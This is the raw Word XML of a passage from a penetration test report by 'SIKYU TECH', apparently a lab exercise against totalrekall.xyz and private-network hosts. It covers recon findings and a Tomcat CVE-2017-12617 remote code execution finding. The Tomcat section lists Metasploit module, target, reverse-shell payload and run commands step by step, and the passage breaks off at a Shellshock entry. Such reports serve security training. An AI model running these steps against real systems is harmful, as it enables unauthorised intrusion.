    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SIKYU TECH uses Domain Dossier to perform domain whois record search of totalrekall.xyz</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="7086600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="23"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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 7: Certificate Information Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000129">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SIKYU TECH uses the crt.sh to search certification information on totalrekall.xyz</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3200400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="16"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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000130">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000131">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000132">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000133">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000134">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000135">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000136">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000137">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pP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rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000139">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000140">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000141">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000142">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000143">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000144">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000145">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pP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rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000147">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000148">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000149">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 8: Apache Tomcat Remote Code Execution Vulnerability (CVE-2017-12617</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000150">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000151">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Method: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">During a recent security assessment, I successfully demonstrated a Remote Code Execution (RCE) vulnerability on a remote host (IP: 192.168.13.10) by utilizing the Metasploit Framework. Specifically, I employed the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tomcat_jsp_upload_bypass</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit module to achieve this.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000152">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The process involved the following steps:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000153">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Launching Metasploit: I started the Metasploit Framework by running </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000154">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Selecting the Exploit Module: I used the exploit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/multi/http/tomcat_jsp_upload_bypass</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command to select the appropriate exploit module for this demonstration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000155">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Configuring the Target: I set the target host IP address using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set RHOSTS 192.168.13.10</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000156">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Setting the Payload: I specified the payload to be used, for example, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set payload java/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000157">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Configuring Payload Options: I configured the necessary payload options, such as the listening IP address and port, using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set LHOST [your IP]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set LPORT [your port]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> commands.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000158">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploiting the Vulnerability: Finally, I executed the exploit using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000159">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This sequence allowed me to successfully bypass security mechanisms and upload a malicious JSP file, which granted me a root-level shell on the target system. The successful exploitation confirmed the presence of an RCE vulnerability in the target's configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5253038" cy="4447572"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="15"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5253038" cy="444757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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability 9: Shellshock</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000015E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Method: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SIKYU TECH uses the Shellshock attack on a remote host (IP: 192.168.13.11) using Metasploit, We launched </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfconsole</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
